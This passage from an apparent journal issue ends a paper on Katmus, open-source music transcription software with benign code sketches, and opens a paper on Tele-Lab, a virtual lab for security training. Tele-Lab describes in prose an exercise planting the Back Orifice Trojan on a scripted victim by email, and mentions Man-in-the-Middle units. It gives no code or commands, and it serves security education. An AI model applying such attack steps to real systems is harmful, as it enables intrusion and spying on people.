tools exist whose purpose is to assist
the task of transcription. Some of these
tools, such as Noteedit [7], focus more
upon facilitating a notational
WYSIWYG editor and provide no
tools for directly interacting with the
audio signal while transcribing. Other
systems, such as Transcribe [8], provide direct frequency analysis from the
segments of the time domain audio signal, thereby indicating fundamental
tones, yet offer no facilities for simultaneously writing the musical score.
Motivated by the shortcomings of presently available software in this domain, the work described in this paper grew out of the need to create a new software application that could aid the process of transcribing music from recorded digital music by merging the strengths of editing software with those of audio signal analysis. The novelty of our software application and its fundamental design criterion lie in the interaction between the notation editor and the audio signal being analyzed, which are directly linked in time. For the user, the measure currently being worked on in the note editor is highlighted in a different color on the rendered audio waveform to show this direct correspondence. Not only does this provide an intuitive user experience, but it really helps transcription, since the user always knows which parts of the audio signal correspond to parts that have been transcribed and which to those parts that are yet to be transcribed.
2 State of the Art
As described in the previous section, other music transcription software
is focused either on music score editing or on the implementation of different analysis tools, but not both together.
There are currently many software solutions, both commercial and open
source, for music notation editing, and
they are often presented in the context
of a much larger and more encompassing computer music tools suite. However, software applications in the particular domain of automatic music transcription have only modest success and
lack many features to make them useful to the music practitioner. Since the
number of computer music software
and applications domains is large and
beyond the scope of this paper, we provide a brief review of software that we
consider to be forerunners to Katmus,
for the specific purpose of aiding
manual music transcription. Thus, following an analysis of these applications, we provide a comparative table
summarizing the features of each that
are of interest for this task.
Sibelius [9] is a commercial music
editing software that is both popular
and easy to use. It supports playback
of complete polyphony arrangements
by using backend instrument synthesis with the use of standard sound fonts,
and the basic functionality can be extended through the use of plugin libraries. The Sibelius suite provides a wide
array of tools, useful for both the experienced musician as well as the amateur. Moreover, several features are
also useful for teaching through functions that allow for the creation of lessons. However, it is not directly designed for manual transcription and
does not provide any facilities for frequency analysis or connection with an
external audio file.
Finale [10] is another proprietary
software tool which is quite complete
and widely used by musicians. Like
Sibelius, it does not provide the ability to simultaneously interact with the time-domain signal and the notation editor at the same time, nor does it provide frequency analysis of the time-domain signal. It is exclusively geared
towards the high quality publication of
sheet music scores.
Noteedit [7] is an open source software application that provides similar
functionality as its commercial counterparts, just described, for editing
scores, as well as saving and exporting midi files. The application is a hybrid between a full sequencer and a
simple notation editor in that it requires
a real time audio server (Jack on Linux)
to provide a patchbay input/output for
midi based instruments, that can interface directly with the notation editor.
However, for the purpose of transcribing music, this application does not
provide useful tools that link the audio
file with the editor, nor does it provide
the ability for project management.
Rosegarden [11] is a more general
purpose open source audio workstation
software that provides audio and MIDI
sequencing, in the same way as Noteedit,
and also provides notation editing. It is
focused on providing a wide range of
complex audio sequencing functionality
and interaction with MIDI inputs found
in high end commercial computer music
suites. For compositional purposes,
Rosegarden contains a complete music score editor which can be connected
to MIDI input devices; however,
Rosegarden does not have specific facilities for manual transcription.
Transcribe [8] is a software tool
specifically designed for aiding manual
music transcription. The application
supports different audio file formats
and provides a graphical interface for
the input audio waveform and corresponding frequency analysis. The main
window consists of an active piano
keyboard with note synthesis so that a
user can compare the tone of a synthesized note with that in the input audio
signal. The main window also contains
the rendered audio waveform and a
plot of the frequency domain is superposed on the scale of the piano keyboard so that the peaks in frequency
are centered on the corresponding
notes of the piano keyboard. Another
useful feature of Transcribe is the ability to replay small segments as well as
change speed without sacrificing the
tone, called time-warping.
With its intuitive design, Transcribe
is a lightweight program useful for
monophonic melodies, yet practically
useless for polyphonic music. Another shortcoming of this tool for more serious transcription tasks is that it does not provide an integrated notation editor that collects the results of the frequency analysis; nor is it possible to add extensions, and since the software is not open source it cannot be extended to include new features.
Like the previous tool, TwelveKeys
[12] is a proprietary software tool that
provides analysis of monophonic and
polyphonic music recordings in order
to identify notes through the display
of the frequency analysis of short time
domain segments of the audio file.
Once again, there is no provision for
annotation of the notes identified, so
external editing software must be used.
AudioScore [13] is another commercial transcription tool that displays
the signal in the time domain together
with the frequency domain analysis for
note identification. This software does
provide an editing environment but, as
with all the other software tools described, the audio file is not directly
linked to the notation editor, so the user
does not know which time domain segment corresponds to a particular measure in the score.
Thus, despite the wide array of software tools for music composition and
transcription described, we believe that
there is a well defined conceptual gap
in the way software tools have approached the problem of transcribing
musical pieces, since they ignore the
manner in which transcription is normally accomplished. We believe the
key concept for a useful transcription
software tool is to provide an explicit
correspondence between the time
Table 1: Comparison of Relevant Software Tools
Figure 2: Main Window Workspace in Katmus.
points in audio input waveform with
the associated measures in the sheet
music score. Our open source software
tool, Katmus [14], bridges this gap.
Moreover, Katmus not only combines
time-frequency analysis of the audio
waveform with a powerful WYSIWYG
score editor, but also introduces a
project based workflow in the process
of music transcription. In the Katmus
environment, having synchronization
between the audio waveform and the
note editor means that updates to the
score have a corresponding update to
the state of the associated time segment
of the waveform. In particular, the state
of being transcribed or not is represented on the rendered waveform as a
color-coded highlight. Thus, an incom-
plete measure in the note editor is represented on the corresponding segment of
the waveform with a different color from
a measure that is completely transcribed.
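A minimal sketch of the bookkeeping that this synchronization implies is given below; the structures and names are illustrative and are not Katmus internals. Each measure of the score carries the audio interval it covers together with a transcription flag, so the waveform view can color each segment according to its state.

```cpp
// Illustrative sketch (not actual Katmus code): linking score measures to
// time segments of the audio waveform and tracking their transcription state,
// so that each waveform segment can be color-coded in the display.
#include <iostream>
#include <string>
#include <vector>

struct Measure {
    int    index;          // position in the score
    double startSec;       // where this measure begins in the audio file
    double endSec;         // where it ends
    bool   transcribed;    // has the user finished this measure?
};

// Color used to highlight the corresponding waveform segment.
std::string segmentColor(const Measure& m) {
    return m.transcribed ? "green" : "orange";
}

// Find which measure (and hence which waveform segment) contains a playback time.
const Measure* measureAt(const std::vector<Measure>& score, double timeSec) {
    for (const Measure& m : score)
        if (timeSec >= m.startSec && timeSec < m.endSec) return &m;
    return nullptr;
}

int main() {
    std::vector<Measure> score = {
        {0, 0.0, 2.0, true},    // first measure already transcribed
        {1, 2.0, 4.0, false},   // second one still pending
        {2, 4.0, 6.1, false},   // measure limits need not be equally spaced
    };
    for (const Measure& m : score)
        std::cout << "measure " << m.index << " [" << m.startSec << " s, " << m.endSec
                  << " s) -> " << segmentColor(m) << '\n';
    if (const Measure* m = measureAt(score, 3.2))
        std::cout << "t = 3.2 s falls in measure " << m->index << '\n';
}
```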
Another important difference between Katmus and other similar software is our emphasis on a project management workflow approach. In this
way, a user can save Katmus sessions,
thereby saving the present state of all
parameters in XML format. With this
state persistence, a user can return at a
later time to an unfinished transcription and continue at the point of the
last session with all the previous parameters restored. Thus, there is no
reason for the transcription to proceed
in a linear order; large sections can be
left untranscribed to be returned to at
a later time. Sections that are complex
can be marked as unfinished, indicating to the user that these are points
which must be revised and/or require
further effort. Project creation in
Katmus is flexible, allowing for multiple scores per audio file, as well as
selecting scores based upon single or
multiple staves. As with other full feature notation editors, Katmus provides
score playback with sound synthesis
support and allows for exporting scores
to PDF or MIDI (Musical Instrument
Digital Interface).
Perhaps one of the most powerful
software architecture features is the
plugin management infrastructure,
which allows for smaller software
modules to be hot-plugged without the
Figure 3: Typical Workflow in Katmus.
need for recompilation of the entire
application. This has the advantage that
experimental audio analysis and other
additional features can be inserted
without affecting the underlying software kernel of the application. Several
modules have been written using this
plugin system, including the timestretching features found in other similar tools, frequency spectral analysis
and filters, and experimental automatic
transcription that can provide suggestions to the user. In this way, Katmus
can act as a powerful workbench for
researchers developing different audio
applications related to musical analysis.
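The following sketch shows the general shape of such a plugin contract: an abstract interface that analysis modules implement and that the host application calls without knowing their concrete type. It is a simplified illustration; Katmus itself builds on the Qt4 plugin machinery, and the class and function names below are assumptions made for the example.

```cpp
// Simplified sketch of a plugin interface for audio-analysis modules
// (illustrative only; the names are hypothetical and Katmus relies on Qt4's
// plugin mechanism rather than this hand-rolled interface).
#include <cmath>
#include <iostream>
#include <memory>
#include <string>
#include <vector>

// Contract every analysis plugin must fulfil: take a segment of audio samples,
// return some textual result (a suggested note, a spectrum summary, ...).
class AnalysisPlugin {
public:
    virtual ~AnalysisPlugin() = default;
    virtual std::string name() const = 0;
    virtual std::string analyze(const std::vector<double>& samples, double fsHz) = 0;
};

// Example module: reports the RMS level of the selected waveform segment.
class RmsPlugin : public AnalysisPlugin {
public:
    std::string name() const override { return "RMS level"; }
    std::string analyze(const std::vector<double>& samples, double) override {
        double sum = 0.0;
        for (double s : samples) sum += s * s;
        double rms = samples.empty() ? 0.0 : std::sqrt(sum / samples.size());
        return "rms = " + std::to_string(rms);
    }
};

int main() {
    // In a real application this vector would be filled by a plugin loader
    // scanning shared libraries at start-up; here one module is registered by hand.
    std::vector<std::unique_ptr<AnalysisPlugin>> plugins;
    plugins.push_back(std::make_unique<RmsPlugin>());

    std::vector<double> segment = {0.1, -0.2, 0.3, -0.1};   // selected waveform samples
    for (const auto& p : plugins)
        std::cout << p->name() << ": " << p->analyze(segment, 44100.0) << '\n';
}
```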
Table 1 shows a comparative summary of the different tools that have
been described in this section, includ-
ing the most relevant parameters for the
specific task of transcription.
Table 1 provides a comparison
which helps describe the advantages of
Katmus, our application for musical
transcription, showing strengths and
weaknesses of other applications with
respect to this problem domain.
3 Environmental Features of
Katmus
As described in the previous section, the novel aspect of Katmus is the
tailored workflow for helping users
transcribe complex musical compositions. This workflow consists of project
management, and a graphical interface
that exposes a WYSIWYG notation
editor coupled to a graphical representation of the time domain signal of the
audio signal. Also integral to this
graphical interface is the ability to listen and apply various analysis algorithms to transcribe the musical arrangement, displaying at all times the
correspondence between what is written, where it appears in the audio signal and score, and playback.
Figure 2 shows the main window
of the Katmus application. The top
panel displays the representation of the
frequency domain audio signal, the
middle panel the time domain signal,
and the bottom panel is the corresponding score. The representation in the frequency domain helps to identify the
notes present in the audio segment. In
the plot representing the audio waveform, it is possible to manually mark
the limits of the measures, thus link-
Table 2: Tests based upon Scenarios.

Project: Open
Background: Request to open an existing Katmus project that contains different scores containing various notes, chords, ties and other stylistic symbols, and/or an audio file in wav, mp3 and/or ogg format. This project may or may not contain errors, be corrupt or have associated audio files.
Sequence of events:
1. If the source file is correct, the application should properly load the project with all source elements.
2. If the source file has errors, the application should display a dialog box indicating that the file is corrupt or not found.

Project: Close
Background: A request is made to close a project.
Sequence of events:
1. Confirms or cancels the closure of a project.
2. Asks the user whether to open or create a new project.

Project: Create
Background: A request is made to create a new project.
Sequence of events:
1. This opens the project creation wizard.
2. Features are introduced into the new project.
3. The option is available to return and update previously entered element values.
4. Loading an invalid file will display an error message.

Project: Save
Background: Create a new score in the project with different elements (time signature, notes, and other symbols).
Sequence of events:
1. The project is saved with the original elements and the updated score.
2. If the project has been previously saved, the name can be changed.

Score: Delete
Background: A score can be selected and removed from the project tree.
Sequence of events:
1. It shows the dialog box for confirmation and removal.
2. If cancelled, the process is aborted.
3. If the score is the only one associated with the project, it cannot be removed.

Score: Export
Background: The user wants to export a score to be rendered.
Sequence of events:
1. The user can choose the format in which to export the score.
2. If the file exists, it can be overwritten.

Score: New
Background: The user wants to add a new score to the project.
Sequence of events:
1. A dialog box is displayed for confirmation.
2. The name and score type are entered.

Score: Rename
Background: The user wants to change the name of a score in the project.
Sequence of events:
1. The score is selected from the project tree.
2. The rename option is chosen and the new name entered.
3. If confirmed, the score is renamed, otherwise the current name is retained.

Score: Playback
Background: The user wants to play back a selected score.
Sequence of events:
1. An instrument is chosen.
2. The score is reproduced with the chosen instrument.
3. The user can choose the same controls as with the reproduction of the audio signal.

Notes: Delete
Background: The user selects one or more notes of a measure, or several measures, to be deleted.
Sequence of events:
1. The selected notes are deleted.

Notes: Copy
Background: The user wants to select one or more notes of a measure, or several measures, to be copied to another measure.
Sequence of events:
1. All selected notes are copied and pasted into the desired measures.

Notes: Cut
Background: The user wants to select one or more notes of a measure, or several measures, to be cut and pasted into another measure.
Sequence of events:
1. The cut notes are removed and pasted in the desired measure.

Notes: Insert
Background: The user wants to select a note or a stylistic symbol to be inserted in the score.
Sequence of events:
1. If the score does not have any measures, then nothing happens.
2. If measures exist, the selected elements are inserted into the desired measure.

Notes: Paste
Background: The user wants to paste one or more notes previously copied.
Sequence of events:
1. An empty space is selected and the notes are copied.
2. If the user tries to paste over an existing note or outside the present measure, then the process is aborted.

Notes: Select
Background: The user wants to select one or more notes in one or more measures.
Sequence of events:
1. The user selects the note and the background color changes.
2. If an empty zone is pressed, the present selection is undone.
3. Selection of multiple notes is performed by selecting the first and dragging the cursor to the last note desired.
4. All notes of a measure or pentagram are selected by selecting an empty zone prior to the notes desired and dragging the cursor to
ing the original signal with the note
editor.
The application can import audio files, which can be played back and are used for analysis during the transcription process. The interface also allows transcriptions, in the form of scores, to be associated with the imported audio files. The major features that Katmus provides the user with are the following:
• Import and associate an audio file to be transcribed within the project. Several audio file formats are supported, including uncompressed wav, mp3 and ogg vorbis.
• Associate different transcriptions with the same audio file within a single project. This feature allows the user to save and maintain several transcriptions of the same audio file or to have individual transcriptions for different instruments.
• Zoom capability in both the audio waveform and the notation editor, which allows the positioning of precise selections of audio segments for fast musical passages.
• Synchronization of the audio waveform with the measures in the score, thereby associating each audio segment with a measure. Combined with a color coding, this provides a powerful functional advantage, since completed and uncompleted parts of the audio file and/or score are indicated, saved and restored for multi-session work.
• Playback of the audio signal. The user can replay the entire signal or certain segments, selected by dragging the mouse over the graphical representation of the audio signal. A powerful feature for transcription is pitch-invariant time-stretching, where time-domain segments can be slowed down without affecting the pitch. This feature is especially interesting for rapid musical segments or in cases where complicated chords (polyphony) need to be resolved.
• Edit scores. The integrated notation editor provides basic functionality for the editing of musical symbols.
• Play back the score. This functionality makes it possible to compare the original melody with the tune of the current work.
• Export scores. Supported formats are PDF, MIDI, Lilypond, SVG or PNG.
4 System Description and
Technical Specifications
One of the fundamental aspects of
the Katmus development and philosophy has been the use of open source
software for its implementation,
thereby encouraging future contributions from a wider community of developers. The application is written in
C++ and makes extensive use of the
open source Qt4 graphical interface
library (originally developed by
Trolltech and now owned by Nokia).
The significant advantages of the Qt4
library are that it is cross-platform,
object-oriented, and provides extensive
technical documentation.
Since Qt provides a complete framework for developing applications, the
core capabilities and functionality of
Katmus rely heavily upon the standard
and advanced features of the library.
Some noteworthy features provided by
Qt in the Katmus application are: (i) the use of the Plugin Manager API for developing shared modules, which extends the basic functionality of the application and encourages third-party contributions and experimentation; (ii) the use of the specialized Qt thread classes, which can greatly accelerate the application's performance on computer architectures that can take advantage of multi-threading; (iii) interoperability through XML document exchange using standard SAX and DOM technology; and (iv) a clean implementation of object event callback handling with the use of the signals and slots paradigm, characteristic of the Qt framework.
Project management in Katmus is
implemented with the use of XML
through a DOM implementation offered explicitly in the Qt4 library. In
order to produce high quality score rendering, scores are exported using a
Lilypond based file generator [15]
which produces the specific language
syntax for post-processing by the
Lilypond compiler that produces the
desired output format (PS, PDF or
MIDI). Within the application, the audio signal is played by invoking the
libao library [16]. This library is cross-platform and provides a simple API for
audio playback that can be used internally or through different standard audio drivers such as ALSA or OSS.
Playback of scores is done with the use
of the Lilypond syntax generator to
generate MIDI files and uses Timidity++ [17] for sound synthesis. The
slow motion playback is programmed
using the Rubberband library [18],
which implements a phase-vocoder
that can change the speed of original
musical audio in real time without affecting the pitch. Finally, to obtain the
frequency domain from the time domain of the audio signal, the popular
open source Fourier transform library,
fftw3 [19], is used.
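To make the Lilypond-based export step more concrete, the toy generator below turns a list of notes into a minimal .ly source file that the Lilypond compiler can then render to a printed score or a MIDI file. It is only an illustration of the approach and is not the Katmus file generator; the structures and names used are assumptions made for the example.

```cpp
// Toy generator of Lilypond source (illustrative only, not the Katmus exporter):
// a list of (pitch, duration) pairs becomes a minimal .ly file that the
// Lilypond compiler can turn into a PDF score or a MIDI file.
#include <fstream>
#include <sstream>
#include <string>
#include <vector>

struct Note {
    std::string pitch;   // Lilypond pitch name, e.g. "c'" for middle C
    int duration;        // 1 = whole, 2 = half, 4 = quarter, 8 = eighth...
};

std::string toLilypond(const std::vector<Note>& notes, const std::string& timeSig) {
    std::ostringstream ly;
    ly << "\\version \"2.12.0\"\n{\n  \\time " << timeSig << "\n  ";
    for (const Note& n : notes)
        ly << n.pitch << n.duration << ' ';
    ly << "\n}\n";
    return ly.str();
}

int main() {
    // One 4/4 measure: C D E F as quarter notes.
    std::vector<Note> measure = {{"c'", 4}, {"d'", 4}, {"e'", 4}, {"f'", 4}};
    std::ofstream("example.ly") << toLilypond(measure, "4/4");
    // The resulting file can then be post-processed with, e.g.:  lilypond example.ly
}
```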
Figure 3 shows the typical workflow
of Katmus, which is a standalone application with a complete user interface. The
first action when launching the application is either to create a new project,
select an existing project saved on disk,
or start a default project by directly importing an audio file.
Since many different options can
be used to instantiate a new project, a
graphical wizard guides the user
through the process of creating a new
project. The information queried during this process includes: (i) the type
of audio file to be imported, (ii) the
channel (if stereo), (iii) the type of
score (one or two staves) and (iv) the
name of the project. Once the project
is successfully created, the standard
work area of the application is instantiated, which consists of three discrete
parts, shown in Figure 2, and described
as follows:
1. Display window for the audio signal: Provides zoom capability to change both the time and the amplitude scale of the audio waveform, which is an important feature for transcription. Thus, the user can focus upon short time-scale segments of the audio waveform. An important feature is the ability to select the time intervals corresponding to the different measures of the score, which are marked in the display window by vertical lines. Since there can be variability of time meters within a musical composition, Katmus offers two different ways of establishing the correspondence between measures and times in the audio signal: (i) manually selecting the limits of each measure in the signal display window by mouse point/click events, or (ii) assigning a constant time duration to all measures, and then making small tweaks to the duration of individual measures where necessary. The user may also interact with the waveform display window by selecting small segments with mouse drag events. In this way, all the points included in the selected waveform segment can be used for subsequent analysis with built-in functions, plugin functions, or repetitive playbacks.
2. Intelligent Score Editor: Once the measures and the time signature are defined, the user can insert the various musical notes and symbols corresponding to the transcription. An important feature of the editor is that the time computation is automatically validated, so that only measures whose contents add up to the declared time signature can be marked as complete (a small sketch of this measure arithmetic is given after this list).
3. Project tree: Displays the different elements, such as scores, measures and audio file, which are part of
the complete transcription project. As
described previously, an advantage of
the project paradigm is that it provides
an intuitive way of allowing Katmus
to contain many transcription scores
for a single audio file, thereby containing different versions of a transcription
or assigning different musical instruments to each separate score.
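The following sketch illustrates, under an assumed data model (this is not Katmus code), the two mechanisms just described: deriving measure boundaries from a constant duration with per-measure tweaks, and validating that the note durations entered for a measure exactly fill its time signature.

from fractions import Fraction

def measure_boundaries(n_measures, default_seconds, tweaks=None):
    # Returns (start, end) times in seconds; tweaks maps a measure index to its individual duration.
    tweaks = tweaks or {}
    bounds, t = [], 0.0
    for i in range(n_measures):
        d = tweaks.get(i, default_seconds)
        bounds.append((t, t + d))
        t += d
    return bounds

def measure_is_complete(note_durations, time_signature=(4, 4)):
    # note_durations are fractions of a whole note, e.g. Fraction(1, 4) for a quarter note.
    beats, beat_unit = time_signature
    return sum(note_durations, Fraction(0)) == Fraction(beats, beat_unit)

print(measure_boundaries(4, 2.0, tweaks={2: 2.5}))
print(measure_is_complete([Fraction(1, 4)] * 3, (3, 4)))  # True: three quarter notes fill a 3/4 bar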
In order to ensure the proper functioning of the system described and the
quality of the software, several evaluation tests were performed. There are
numerous methods of evaluation in the
literature that ensure the quality of software development based upon the
product type and metrics [20]. For
Katmus, both functional and structural
tests were performed focusing specifically on object-oriented systems.
The method chosen for these tests
is based upon scenarios, since it focuses upon actions that the user performs in order to discover interaction
errors. This means that tasks performed
by users must be captured in a series of use cases and any possible variants which may arise. Tests are then performed on this set of cases.
Table 2 shows a set of tests based on
usage scenarios of the application.
Applying each of these scenarios to the
Katmus software system resulted in a
thorough method for debugging the
application.
Functional, or black-box, testing
was applied to the user interface for
testing usage cases. The evaluation was
based on informal handling tests following the evaluation cycle of the interface [21] during which users evaluated beta versions of the software in
order to provide informal feedback for
debugging the final design.
Once extensive usage tests and bug
fixes were performed, Katmus was
made available to the wider user community at SourceForge in July 2009.
Since then, hundreds of users have successfully downloaded and installed the
application without significant incident.
5 Conclusions and future work
This paper presents the architecture, implementation, and philosophy
of Katmus, which is an easy-to-use software platform designed to help musicians, professionals, teachers and students with complex music transcription
tasks. For the expert musician, the
Katmus philosophy and implementation provides a natural mapping of the
transcription process which is a great
aid to producing the final arrangement.
For the more novice users, Katmus provides facilities that reinforce the recognition of musical notes and chords
and may serve as an educational tool.
The end result is open source transcription software that is both intuitive
and easy to use. Moreover, the application is easily extendible with the use
of a plugin architecture that simplifies
the addition of enhancements or experimental algorithms. By taking advantage of open source philosophy,
future code enhancements and extendible modules could be provided by
community contributions in the following areas:
• Extending the capabilities of the notation editor.
• Using beat detection algorithms for accurately associating measures.
• Extending the support for sequencing MIDI to handle more complex polyphonic output.
• Extending the labeling system for measures.
• Providing support for multi-channel audio analysis.
• Module development for audio signal editing.
References
[1] R. Bennett. Elementos básicos de
la música. Ed. Jorge Zahar, 1998.
[2] K.D. Martin. Automatic transcription of simple polyphonic music:
a robust front end processing.
MIT Media Laboratory Perceptual Computing Section. Technical Report No. 385, 1996.
[3] M. Pizczalski. A computational
model of music transcription.
PhD. Thesis, University of Michigan, Ann Arbor, 1986.
[4] A. Sterian. Model based segmentation of time-frequency images
for musical transcription. PhD.
Thesis, University of Michigan,
1999.
[5] W. Hess. Pitch determination of
speech signals. Springer-Verlag,
New York, 1983.
[6] A. Klapuri and M. Davy. Signal
processing methods for music
transcription, Springer cop., New
York, 2006. doi=10.1.1.1.4071
[7] Notedit. <http://noteedit.berlios.de/>.
[8] Transcribe. <http://www.seventhstring.com/>.
[9] Sibelius. <http://www.sibelius.com>.
[10] Finale. <http://www.finalemusic.com/>.
[11] Rosegarden. <http://www.rosegardenmusic.com/>.
[12] Twelvekeys. <http://twelvekeys.softonic.com/>.
[13] Audioscore. <http://www.neuratron.com/audioscore.htm>.
[14] Katmus. <http://katmus.sourceforge.net/>.
[15] Lilypond. <http://lilypond.org/>.
[16] Libao. <http://www.xiph.org/ao/>.
[17] Timidity++. <http://timidity.sourceforge.net/>.
[18] Rubberband. <http://www.breakfastquay.com/rubberband/>.
[19] Fftw3. <http://www.fftw.org/>.
[20] A. R. Hevner, S. T. March, J. Park, S. Ram. Design Science in Information Systems Research. Management Information Systems Quarterly, Vol. 28, No. 1, 2004.
[21] R.S. Pressman. Software Engineering: A Practitioner’s Approach. McGraw Hill, 6th edition,
2006.
UPENET
IT Security
Practical IT Security Education with Tele-Lab
Christian Willems, Orestis Tringides, and Christoph Meinel
© 2011 Pliroforiki
This paper was first published, in English, by Pliroforiki (issue no. 21, July 2011, pp. 30-38). Pliroforiki, ("Informatics" in
Greek), a founding member of UPENET, is a journal published, in Greek or English, by the Cyprus CEPIS society CCS (Cyprus
Computer Society, <http://www.ccs.org.cy/about/>). The July 2011 issue is available at <http://www.pliroforiki.org/>.
The rapid growth of Internet usage, and the corresponding rise in security risks and online attacks faced by the everyday user or the enterprise employee, has given rise to the terms Awareness Creation and Information Security Culture. Nevertheless, security education has largely remained an academic issue. Teaching system security or network security on the basis of practical experience poses a great challenge for the teaching environment, which is traditionally met by a computer laboratory on a university campus. The Tele-Lab project offers a system for hands-on IT security training in a remote virtual lab environment – on the web, accessible at any time.
Keywords: Information Security,
IT Security Training, Online Attacks,
Security Risks, Tele-Lab Project, Virtual Lab Environment.
Introduction
The increasing propagation of complex IT systems and the rapid growth of the Internet draw more and more attention to the importance of IT security issues. Technical security solutions cannot completely compensate for the lacking awareness of computer users, caused by indifference, laziness, inattentiveness, and a lack of knowledge and education. In the context of awareness creation, IT security training has become a topic of strong interest – for companies as well as for individuals.
Traditional techniques of teaching (i.e. lectures or literature) have turned out to be unsuitable for IT security training, because the trainee cannot apply the principles from the academic approach to a realistic environment within the class. In IT security training, gaining practical experience through exercises is indispensable for consolidating the knowledge.
Authors
Christian Willems studied computer science at the University of Trier, Germany, and received his diploma degree in 2006. Currently he is a research assistant at the Hasso-Plattner-Institute for IT Systems Engineering, giving courses on internet technologies and security. Besides that he is working on his PhD thesis at the chair of Prof. Dr. Christoph Meinel. His special research interests focus on Awareness Creation, IT security teaching and virtualization technology. <[email protected]>
Orestis Tringides is the Managing Director of Amalgama Information Management and has participated in research projects since 2003 in the areas of e-learning, e-business, ICT Security and the Right of Access to Information. He holds a B.Sc. degree in Computer Science, an M.Sc. degree in Information Systems and is currently pursuing an MBA degree. He also participates in Civil Society projects and is interested in elderly care, historical remembrance, soft tourism and social inclusion. <[email protected]>
Christoph Meinel is scientific director and CEO of the Hasso-Plattner-Institute for IT Systems Engineering and professor for computer science at the University of Potsdam, Germany. His research field is Internet and Web Technologies and Systems. Prof. Dr. Meinel is author or co-author of 10 text books and monographs and of various conference proceedings. He has published more than 350 peer-reviewed scientific papers in highly recognised international scientific journals and conferences. <[email protected]>
It is precisely the allocation of an environment for these practical exercises that poses a challenge for research and development. That is because students need privileged access rights (a root/administrator account) on the training system to perform most of the conceivable security exercises. With these privileges, students could easily destroy a training system or even use it for unintended, illegal attacks on other hosts within the campus network or on the Internet.
Figure 1: Screenshot of the Tele-Lab Tutoring Interface
The classical approach requires a
dedicated computer lab for IT security
training. Such labs are exposed to a
number of drawbacks: they are immobile, expensive to purchase and maintain and must be isolated from all other
networks on the site. Of course, students are not allowed to have Internet
access on the lab computers. Handson exercises on network security topics even demand to provide more than
one machine to each student, which
have to be interconnected (i.e. a Manin-the-Middle attack needs three computers: one for the attacker and two
other machines as victims).
Teleteaching for security education
mostly consists of multimedia
courseware or demonstration software,
which do not offer real practical exercises. In simulation systems users do
have a kind of hands-on experience,
but a simulator doesn’t behave like a
realistic environment and the simulation of complex systems is very difficult – especially when it comes to interacting hosts on a network. The Tele-Lab project builds on a different approach for a Web-based teleteaching system (explained in detail in section 2).
Furthermore, we will describe a set
of exercise scenarios to illustrate the
capabilities of the Tele-Lab training environment: a simple learning unit on
password security, an exercise on
eavesdropping, and the practical application of a Man-in-the-Middle attack.
Tele-Lab: A Remote Virtual Security Laboratory
Tele-Lab, accessible at <http://
www.tele-lab.org>, was first proposed
as a standalone system [4], later enhanced to a live DVD system introducing virtual machines for the hands-on
training [3], and then evolved into the Tele-Lab server [2, 6]. The Tele-Lab server provides a novel e-learning system for practical security training in the
WWW and inherits all positive characteristics from offline security labs.
It basically consists of a web-based
system (see Fig. 1) and a training environment built of virtual machines.
The tutoring system provides learning
units with three types of content: information chapters, introductions to
security- and hacker tools and finally
practical exercises. Students perform
those exercises on virtual machines
(VM) on the server, which they operate via remote desktop access. A virtual machine is a software system that
provides a runtime environment for
operating systems. Such software-emulated computer systems allow easy
deployment and recovery in case of
failure. Tele-Lab uses this feature to
revert the virtual machines to the original state after each usage. This is a significant advantage over the traditional
setting of a physical dedicated lab,
since the recovery to the original state
can be performed quicker, more often
and without any manual maintenance
efforts.
With the release of the current Tele-Lab 2.0, the platform introduced the
dynamic assignment of several virtual
machines to a single user at the same
time. Those machines are connected
within a virtual network (known as
team, see also in [1]) providing the
possibility to perform complex network attacks such as Man-in-the-Middle or interaction with a virtual
(scripted) victim (see exemplary description of a learning unit below).
A short overview of the Tele-Lab
architecture is given later in this section.
A Learning Unit in Tele-Lab
An exemplary Tele-Lab learning
unit on malware (described in more
detail in [5]) starts off with academic
knowledge such as definition, classification, and history of malware
(worms, viruses, and Trojan horses).
Methods to avoid becoming a victim
and relevant software solutions against
malware (e.g. scanners, firewalls) are
also presented. Afterwards, various existing malware kits and ways for distribution are described in order to prepare the hands-on exercise. Following
an offensive teaching approach1 , the
user is asked to take the attacker’s perspective – and hence is able to lively
experience possible threats to his/her
personal security objectives, as if
physical live systems were used. The
closing exercise for this learning unit
on malware is to plant a Trojan horse
on a scripted victim called Alice – in
particular, the Trojan horse is the outdated Back Orifice2.
1 See [9] for different teaching approaches.
Figure 2: Architecture of the Tele-Lab Platform.
In order to
achieve that, the student has to prepare
a carrier for the BO server component
and send it to Alice via e-mail. The
script on the victim VM will reply by
sending back an e-mail, indicating that
the Trojan horse server has been installed (that the e-mail attachment has
been opened by the victim). The student can now use the BO client to take
control of the victim’s system and spy
out some private information. The
knowledge of that information is the
user’s proof to the Tele-Lab tutoring
environment that the exercise has been
successfully solved.
Such an exercise implies the need
for the Tele-Lab user to be provided
with a team of interconnected virtual
machines: one for attacking (with all
necessary tools pre-installed), a mail
server for e-mail exchange with the
victim and a vulnerable victim system
(in this particular case, an unpatched
Windows 95/98). Remote Desktop
Access is only possible to the attacker’s VM.
Learning units are also available on
e.g. authentication, wireless networks,
secure e-mail, etc. The system can easily be enhanced with new content. For
example, in a project in which the Hasso-Plattner-Institute, the Vilnius Gediminas Technical University (VGTU), nSoft and Amalgama Information Management Ltd. participate, new learning units were easily added to the
VGTU implementation of Tele-Lab,
<http://telelab.vgtu.lt>, and have been
shared among partners. The content
was translated for Lithuanian language
localization. For the future, the project
consortium plans to add more learning
units and expand localization for the
Greek language.
Architecture of the Tele-Lab Server
The current architecture of the Tele-Lab 2.0 server is a refactored enhancement to the infrastructure presented in
[6]. Basically, it consists of the following components (illustrated in Fig. 2).
Portal and Tutoring Environment:
The Web-based training system of
Tele-Lab is a custom Grails3 application running on a Tomcat application
server. This web application handles
user authentication, allows navigation
through learning units, delivers their
content and keeps track of the students’
progress. It also provides controls to
request a team of virtual machines for
performing an exercise. The Portal and
Tutoring Environment (along with the
Database and Administration Interface
components described later on) offer
tutors and students facilities of a Learning Management System, such as centralized and automated administration,
assembly and delivery of learning content, reuse of the learning units, etc.
[11]
Virtual Machine Pool: The server
is loaded with a set of different virtual
machines needed for the exercise scenarios – the pool. The resources of the
physical server limit the maximum total number of VMs in the pool. In practice, a few (3-5) machines of every kind
are started up. Those machines are dynamically connected to teams and
bound to a user on request. The current hypervisor solution used to provide the virtual machines is KVM/
Qemu4. The way virtual machines are used in Tele-Lab’s architecture allows for further creative ways to allocate resources in an optimized and collaborative manner, by setting up collaboration among different instances of the Tele-Lab system that are installed on different sites: in the example of the
abovementioned consortium, HPI’s
and VGTU’s Tele-Lab servers share resources in order to dynamically provide virtual machines to each other,
when needed. For example: if a student from VGTU requests to conduct
a laboratory exercise, but the VGTU’s
Tele-Lab server has already reached the
